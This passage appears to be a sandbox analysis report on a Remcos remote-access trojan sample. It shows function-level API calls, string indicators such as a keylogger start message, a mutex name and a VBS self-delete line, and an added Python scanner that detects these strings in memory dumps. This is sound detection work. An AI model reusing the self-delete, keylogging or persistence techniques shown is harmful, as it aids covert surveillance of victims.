                                          • Opcode ID: 79900052c1cedfcfdca54da2a4a728cafc0d46dafbcbcd06ae49b5f1d646b7e0
                                          • Instruction ID: d8c825886b0a0d8326cbfb5c9d4cc5050fd80dde9ad4bcb2ea62c87b00a1b781
                                          • Opcode Fuzzy Hash: 79900052c1cedfcfdca54da2a4a728cafc0d46dafbcbcd06ae49b5f1d646b7e0
                                          • Instruction Fuzzy Hash: 03526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
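The String IDs in this and the neighbouring function records (the "5.2.0 Pro" version tag, the "Rmc-8AGIM5" identifier, the "Connected | " / "Connecting | " status prefixes, the keep-alive and TLS handshake messages, the idle-time notice and the VBS self-delete one-liner) are stable enough to hunt for in unpacked images and memory dumps. The scanner below is an added example written for this page; it is not Joe Sandbox output and not Remcos code. The regexes are this example's own generalisation of the listed strings (Remcos configurations carry an "Rmc-"-prefixed mutex name, so the identifier is matched as a pattern rather than the literal value), the scoring threshold is an assumption, and the input buffer is constructed for the demonstration. Strings may be encrypted in a packed dropper, so it applies to decoded samples such as this one or to process memory, not to the packed stage.

```python
from __future__ import annotations

import re

# Indicator strings copied from the String IDs in this report's function records
# (main connection loop, TLS connect routine, idle-time monitor, keep-alive thread,
# self-delete script writer). The regexes are this example's own, not Joe Sandbox's.
INDICATORS = {
    "version_pro":    rb"\d+\.\d+\.\d+ Pro",                   # "5.2.0 Pro"
    "rmc_id":         rb"Rmc-[A-Za-z0-9]{4,12}",                # "Rmc-8AGIM5"
    "keepalive":      rb"KeepAlive \| Enabled \| Timeout: ",
    "tls_handshake":  rb"TLS Handshake\.\.\. \| ",
    "conn_status":    rb"Connect(?:ed|ing) \| ",
    "idle_notice":    rb"User has been idle for ",
    "vbs_selfdelete": rb"fso\.DeleteFile\(Wscript\.ScriptFullName\)",
}
# Family-specific markers; the generic status strings alone are not enough.
STRONG = {"version_pro", "rmc_id", "keepalive", "vbs_selfdelete"}


def _views(data: bytes):
    """Yield the raw bytes plus two de-widened copies so that UTF-16LE strings
    (at either byte alignment) are searchable with the same ASCII regexes."""
    yield data
    for off in (0, 1):
        yield data[off:].decode("utf-16le", errors="ignore").encode("ascii", errors="ignore")


def scan(data: bytes) -> dict[str, str]:
    """Return {indicator: first matched string} for every indicator found."""
    hits: dict[str, str] = {}
    for label, pattern in INDICATORS.items():
        rx = re.compile(pattern)
        for view in _views(data):
            m = rx.search(view)
            if m:
                hits[label] = m.group(0).decode("ascii", errors="replace")
                break
    return hits


def is_remcos_like(hits: dict[str, str]) -> bool:
    """Heuristic verdict (threshold is an assumption): at least three indicators,
    one of them family-specific."""
    return len(hits) >= 3 and bool(STRONG.intersection(hits))


# Constructed test buffer (not a real dump): ANSI strings with NUL terminators,
# one UTF-16LE string at an odd offset, and filler bytes in between.
SAMPLE = (
    b"\x00" * 16
    + b"KeepAlive | Enabled | Timeout: \x00"
    + b"Rmc-8AGIM5\x00"
    + b"5.2.0 Pro\x00"
    + "TLS Handshake... | ".encode("utf-16le")
    + b"\x00" * 8
    + b"fso.DeleteFile(Wscript.ScriptFullName)\x00"
)

if __name__ == "__main__":
    found = scan(SAMPLE)
    for label, text in found.items():
        print(f"{label:15s} {text!r}")
    print("remcos-like:", is_remcos_like(found))
```

Run it against a memory dump or the decoded executable; a single status string is not a verdict, which is why `is_remcos_like` insists on one of the family-specific markers plus supporting hits.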

                                          Control-flow Graph

                                          APIs
                                          • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $xd
                                          • API String ID: 994465650-4088167138
                                          • Opcode ID: 38b3cb5bd10e09c7b3bd40259f36f96c9113b6101ffe131655b2f6876ea9c128
                                          • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                          • Opcode Fuzzy Hash: 38b3cb5bd10e09c7b3bd40259f36f96c9113b6101ffe131655b2f6876ea9c128
                                          • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                          Control-flow Graph

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                          • String ID: [${ User has been idle for $ minutes }$]
                                          • API String ID: 911427763-3954389425
                                          • Opcode ID: f1beafbc65b67ea611c27b04d98e1104d59d3344b0708eb8d40cf24d2962f261
                                          • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                          • Opcode Fuzzy Hash: f1beafbc65b67ea611c27b04d98e1104d59d3344b0708eb8d40cf24d2962f261
                                          • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F

                                          Control-flow Graph

                                           (graph rendered as an image in the original report; legend: Executed / Not Executed) Function 0040DA6F, basic blocks 0040DA6F-0040DC56. API call shown in the graph: GetLongPathNameW.
                                          APIs
                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-425784914
                                          • Opcode ID: f4c7df661c5bec9d099b359126bde6595d68bd7cf9e1ce7f7ed169ab2082938e
                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                          • Opcode Fuzzy Hash: f4c7df661c5bec9d099b359126bde6595d68bd7cf9e1ce7f7ed169ab2082938e
                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                          • String ID: HSG$HSG$xdF
                                          • API String ID: 3795512280-1850865910
                                          • Opcode ID: 94b06e53037e07a132a44a0c171d15b1bbffd87d4b076595ec05959e5486cbcf
                                          • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                          • Opcode Fuzzy Hash: 94b06e53037e07a132a44a0c171d15b1bbffd87d4b076595ec05959e5486cbcf
                                          • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E

                                          Control-flow Graph

                                           (graph rendered as an image in the original report; legend: Executed / Not Executed) Function 0041B354, basic blocks 0041B354-0041B410. API call shown in the graph: StrToIntA.
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750F4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$hd
                                          • API String ID: 782494840-431310935
                                          • Opcode ID: 40b4b818fe30f98410963cd3dc02b2c3b2616f089d502d216bf83757675de9ba
                                          • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                          • Opcode Fuzzy Hash: 40b4b818fe30f98410963cd3dc02b2c3b2616f089d502d216bf83757675de9ba
                                          • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE

                                          Control-flow Graph

                                           (graph rendered as an image in the original report; legend: Executed / Not Executed) Function 0041C482, basic blocks 0041C482-0041C515. API calls shown in the graph: CreateFileW, SetFilePointer, WriteFile, CloseHandle.
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID: xpF
                                          • API String ID: 1852769593-354647465
                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                          Control-flow Graph

                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSizeSleep
                                          • String ID: hQG
                                          • API String ID: 1958988193-4070439852
                                          • Opcode ID: bdea57dd96df53d9e829f51e58303117b441e911e19fc522471032f737d6d9df
                                          • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                          • Opcode Fuzzy Hash: bdea57dd96df53d9e829f51e58303117b441e911e19fc522471032f737d6d9df
                                          • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: !D@$,aF
                                          • API String ID: 180926312-3317875915
                                          • Opcode ID: 835ff592c5993026ff64b06b2c7e29c4e321652dc365d191a4eb1ca34464d222
                                          • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                          • Opcode Fuzzy Hash: 835ff592c5993026ff64b06b2c7e29c4e321652dc365d191a4eb1ca34464d222
                                          • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A

                                          Control-flow Graph

                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTimewsprintf
                                          • String ID: Offline Keylogger Started
                                          • API String ID: 465354869-4114347211
                                          • Opcode ID: 8ab6887ada05f8dedd4f656d1a6307b8369bab4b1d95e8e063819601f7111091
                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                          • Opcode Fuzzy Hash: 8ab6887ada05f8dedd4f656d1a6307b8369bab4b1d95e8e063819601f7111091
                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                          • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc
                                          • API String ID: 1818849710-4028850238
                                          • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                          • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                          • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 3360349984-0
                                          • Opcode ID: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                          • Opcode Fuzzy Hash: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                          APIs
                                          • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEventStartupsocket
                                          • String ID: xd
                                          • API String ID: 1953588214-1412088292
                                          • Opcode ID: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                          • Instruction ID: d30f6c82ceabff406a890a607b6903e59214fa94f63df9469096212d3e1caec2
                                          • Opcode Fuzzy Hash: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                          • Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18
                                          APIs
                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,xd,004750F4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                          • String ID: xd
                                          • API String ID: 1170566393-1412088292
                                          • Opcode ID: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                          • Instruction ID: b2b0aefd8e35b341f4c894e58f46b645776b5e98a3349e02c71c7f637998c076
                                          • Opcode Fuzzy Hash: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                          • Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID: Rmc-8AGIM5
                                          • API String ID: 1925916568-3827265645
                                          • Opcode ID: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                          • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                          • Opcode Fuzzy Hash: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                          • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: e238dbc9e2073977e027648aa5af93dfac856dda57be128719874f60decc0002
                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                          • Opcode Fuzzy Hash: e238dbc9e2073977e027648aa5af93dfac856dda57be128719874f60decc0002
                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
